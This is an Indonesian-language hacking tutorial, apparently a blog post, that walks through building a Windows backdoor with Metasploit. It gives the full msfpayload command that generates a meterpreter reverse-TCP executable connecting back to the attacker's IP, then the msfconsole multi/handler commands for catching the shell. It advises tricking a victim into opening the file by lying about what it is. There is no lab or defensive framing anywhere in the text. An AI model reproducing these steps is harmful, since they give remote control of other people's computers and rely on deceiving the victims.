Standard exploit seperti potongan judul diatas, yang bisa diartikan "exploit biasa" dalam metasploit ( contoh dasar dalam menjalankan exploitasi pada sistem target ) karena didalam peng-exploitan ini saya tidak melibatkan encoder , penghindaran karakter, dll. Hanya exploit yang dijalankan oleh metasploit sendiri.

Oke tanpa basa-basi lagi, mari membuat backdoor dengan bantuan msfpayload 

root@dani:[~]# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.13.115 LPORT=4444 X > /root/Desktop/backdoor.exe



 * Keterangan :

    LHOST = Your IP
    LPORT = Choose your port ( Default: 4444 )
    X = Format for executable file
    windows/meterpreter/reverse_tcp =  Your payload to open meterpreter

Backdoor saya buat dengan nama backdoor.exe
Lanjut untuk listeningnya supaya ketika file backdoor dijalankan oleh korban, yang terbuka di komputer kita adalah metepreter

Buka Msfconsole

Lalu ketikkan command seperti ini

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.13.115
LHOST => 192.168.13.115
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit

Langkah selanjutnya buat korban mengakses backdoor buatan kamu tadi, bagaimana caranya ? gunakan kreativitas, contoh dengan memberitahu bahwa file itu adalah file blablabla

Kita lihat korban saat mengakses backdoor


Apa yang terjadi ? hanya overflow di pc korban, mari buka kembali hasil listening payload tadi 


w00t ! you got pwned =)

by Altiiever